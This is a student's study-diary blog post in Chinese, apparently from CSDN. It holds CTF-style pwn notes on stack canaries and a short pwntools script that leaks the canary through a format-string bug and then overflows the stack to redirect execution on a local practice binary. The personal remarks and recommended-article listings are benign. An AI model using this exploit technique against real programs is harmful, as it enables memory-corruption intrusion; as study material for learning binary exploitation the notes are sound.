C-L学习打卡(7.6)

最新推荐文章于 2022-02-14 22:24:12 发布
最新推荐文章于 2022-02-14 22:24:12 发布
阅读量104 收藏
点赞数 1
分类专栏: 究极学习打卡1.0
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50166464/article/details/118520907
版权

今天又换了个地点学习,真是得百般适应,不过今天在车上在想,CPP好久没看了,并且昨日听了kk意见,换成机动休息日,不是一周一休了,感觉也挺合理。--7.6

7.6 To do list:

1.Pwn笔记整理

2.Cpp程序题 向下阅读10页

一:Pwn笔记整理

这是重新调整的cannary笔记,发现之前是根本没理解,说实话现在也有点不是十分清楚。

gdb调试的时候记得要提权

要不然会调试不了

canary每次运行,每次的值都会改变

这个是运用canary的程序

然后ebp-0xc存放了值

然后利用%k$p

用sendline默认会有个回车 要去掉回车就指定八位

exp.py

from pwn import * p = process("./printf") #获得进程 canary_offset = 8*4 p.sendline("%15$08x") #获取canary值 canary = p.recv()[:8] #指定八个字符,要不然sendline会有个换行 ret_offset = 3*4 print canary canary = canary.decode("hex")[::-1] #转成16进制,小端存储 exploit_address = p32(0x080484e6) #exploit地址 payload = canary_offset*'a' + canary + ret_offset*'a' + exploit_address p.sendline(payload) p.interactive()

从前可知cannary值再ebp-0xc

那么执行到printf时,我要用利用格式化字符串漏洞获取cannary值,然后就看printf下的栈情况(如上图)

esp到ebp-0xc的位置是15行,000到03c,一行四个字节,于是就%15$8x,这样打印

然后read函数读取到的数据会放在0xffffd53c这个位置,所以对应栈中的顺序,第二个payload先是8行到cannary再3行覆盖放exploit地址,程序直接就会成功pwn

二:Cpp

太久没看这书了,作者真写挺好,不愧是业界经典。

今天两个指甲甲沟炎包扎,花费了许多时间,还有泡芙和西瓜没有放到冰箱了,现在我得赶紧起身and明天不能睡到十一点多了,设了个十点半的闹钟,Siri声音莫名变了,不过不要想太多,快点休息。night.

水番正文
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
深入探索c/c++函数(1)---全局函数调用的基本过程
坏坏的嘟嘟猫
04-25 6964
在c/c++等许多程序设计语言中,可以将一段经常需要使用的代码封装起来,在需要使用时可以直接调用,这就是程序中的函数,函数内封装了对数据和逻辑的处理。通过函数调用来执行函数体,下面根据代码进行分析。#include using namespace std;int test(int a,int b){      return a+b;}int main(int argc, char* argv[
btcpool矿池源码分析(7)-sharelogger模块解析
尹成的技术博客
05-20 813
# btcpool矿池-sharelogger模块解析## 核心机制总结* 接收SHARE_LOG,写入shares_,每2秒写入文件(路径由data_dir指定)  * 每天一个新文件,文件名形如:sharelog-2016-07-12.bin  * 最多维护最近3天的文件句柄## sharelogger命令使用```shellsharelogger -c sharelogger.cfg -l ...
C 语言命令行参数解析
也说安卓
02-01 1341
C语言源代码必须有且只有一个的函数是main函数,我们知道函数可以有参数,那么main函数有没有参数呢? 显然是有的,而且它是固定的,只有两个,第一个是整型变量(argc),第二个是字符型指针数组(argv)。看下面这个例子 /* FileName: sum.c Description: Calculate the numbers which from the command line arg
在汇编的角度来理解C语言3级指针
vs2008ASPNET的专栏
07-09 465
C语言中指针使用频率是很高的,我们知道指针一个特殊的变量,它的值是指向一块内存地址我写了一个简单的C代码void Test1() {     int ***ptr_int = NULL;       int i1 = 100;       int *ptr_1 = &i1; //一级内存地址空间偏移       int **ptr_2 = &ptr_1; //二级内存地址空间偏移 ...
[备忘]栈 EBP ESP
zhuhuibeishadiao
05-02 1077
未进行函数梗之前 此时ebp无效 还没push ebp esp = 返回地址 esp + 4 参数1 esp + 8 参数2 esp = 0020FC84 0020FC84  01071597  返回到 EbpEsp.01071597 来自 EbpEsp.0107109B // esp 返回地址 0020FC88  00000003  //esp + 4 参数1 0020FC8C
初识C语言-第十天 打学习
05-03
适合C语言初学者
钉钉企业内部应用 - 获取考勤打结果
07-07
钉钉企业内部应用 - 获取考勤打结果
疫情打健康评测-疫情打健康评测系统-疫情打健康评测系统源码-疫情打健康评测管理系统-疫情打健康评测管理系统java代码
04-17
疫情打健康评测-疫情打健康评测系统-疫情打健康评测系统源码-疫情打健康评测管理系统-疫情打健康评测管理系统java代码-疫情打健康评测系统设计与实现-基于springboot的疫情打健康评测系统-基于Web的...
clock-admin:打小程序管理后台
02-21
English |蚂蚁设计专业Vue 适用于企业应用程序的即用型UI解决方案,作为Vue样板。 基于 预览: : 主页: : 文档: : 变更日志: : 常见问题解答: : 概述环境和依赖节点纱网络包埃斯林特@ vue / cli〜3 -Vue的...
Win32 反汇编
qiuxue110的专栏
02-14 2601
ollydbg 原版下载,网上有很多的版本,下载及测试后发现还是原版的比较好,但是原版没有各种各样的插件,这就需要自己把插件导入进去了,插件及配色界面下载
Y-L 学习(8.8)
weixin_50166464的博客
08-09 79
本适应在无空调的房间学习是一种历练,因为每个暑假都那样熬过来,这个暑假被蚊子劝退...AM11:28 来Y-24城市第一次这么早开始写,打打着打着忘了原来的目的,是为了,早上布置List,睡觉前一定淦完,今天任务量很大,加油。--8.8 8.8 To do list: 1.周末作业 2.Cpp程序效验加传博客 3.每日锻炼&拉伸 4.《网 安 大 道 3》(这次疫情太突然,基本没素材了,不知道能不能剪and这次题材也没想好) ...
c语言缓冲区溢出漏洞PDF,缓冲区溢出-printf格式化输出漏洞
weixin_30045751的博客
05-19 463
0x00本文视频:如果文字过于枯燥可观看在线视频:https://edu.51cto.com/sd/165140x01基础知识:在c语言中printf的使用方法为printf(format,),printf是c语言中少见的可变参数的库函数,printf在调用前无法知道传入的参数到底有多少个(在32位汇编中参数都是压入栈中,也就是说printf不知到有多少个参数入栈了),例如printf("My n...
G-L学习(7.1)
weixin_50166464的博客
07-02 68
事实证明最近真的有点劳累过度,今天睡到十一点状态好多了,过几天又要换个城市住了,有点麻烦,同时外婆家住的真的好舒服,虽然每年都很喜欢过来住,但今年的感觉让我好安心。--7.1 7.1 To do list: 1.每日Pwn学习 2.堆排序修改细节 阅读到7.4 3.Cpp向下阅读十页 程序练习六题 ...
W-L学习(7.11)
weixin_50166464的博客
07-12 75
DEFINITELY,今天状态不是很好,随着很快要去W-7城市,我仿佛有些期待,这种感觉是那种如果1到10分我会打7分的感觉,说实话只有以前我会对去外婆家会打9~10分,旅游会8~10分,难道是随着年龄长大我已经有点不会期待了吗,不过说到底也是过去学习的,我期待了一个我以前一直在期待的事情,一群人奋战学习(团队似的),说实话这是我从小到大以来从没没有感受的群体学习,从高中开始就一直在自己学,当然一直很渴望找个人能一起学习,但如今过去这么多年了,虽然大学的竞赛队不错,但说实话也是感觉在自己学习,今天话有点多,
逆向工程实验---二进制炸弹(CSAPP Project)
热门推荐
JackieFrederickHYZ的博客
05-22 1万+
本实验设计为一个黑客拆解二进制炸弹的游戏。我们仅给黑客(同学)提供一个二进制可执行文件bomb和主函数所在的源程序bomb.c,不提供每个关的源代码。程序运行中有6个关(6个phase),每个关需要用户输入正确的字符串或数字才能通关,否则会引爆炸弹(打印出一条错误信息,并导致评分下降)!要求同学运用GDB调试工具和objdump反汇编工具,通过分析汇编代码,找到在每个phase程序段中,引导程
Y-L 学习(8.6)
weixin_50166464的博客
08-07 63
8.6 To do list: 1. 好好上课 2. Cpp 3. 每日锻炼&拉伸 一:好好上课 今天好多作业啊,这个周末..不过老师的一句倒是说对了,适应性训练,早上边睡边看网课的感觉,仿佛回到了去年,这个暑假加紧干完,真的好多,淦! 二:Cpp 没想到DEC不支持边长数组,书上经常说会有些不支持,本以为我的编译器全部支持,或许是我打的有问题?全部打完去看看标记第九题。 三:每日锻炼&拉伸 今天又悟了一些,脖子拉伸太重要了,每天都应该来一两遍! 今天终于
格式化字符串漏洞_格式化字符串绕过canary入门
weixin_39611340的博客
12-09 171
原创: EDI-VOID 合天智汇 知识格式化字符串漏洞是因为c语言中printf的参数个数不是确定的,参数的长度也不是确定的,当printf把我们的输入当作第一个参数直接输出的时候,我们输入若干格式化字符串,会增加与格式化字符串相对应的参数,会泄露出栈中的内容Canary的工作原理就是子函数在做自己的事情之前,在自己的栈帧里返回地址之前插入一个随机的cookie,从gs:0x14的地方取出...
protobuf-3.15.7-cp38-cp38-macosx_10_9_x86_64.whl
最新发布
06-17
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
基于STM32微控制器的简单超声波液位控制器
06-17
基于STM32微控制器的简单超声波液位控制器
c语言实验四健康打
12-11
C语言实验四是关于健康打的实验。健康打是一种日常记录自己身体健康状况的方法,可以帮助人们更好地了解自己的身体状况,并及时发现潜在的健康问题。这个实验要求我们使用C语言编写一个健康打的程序。 在编写...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值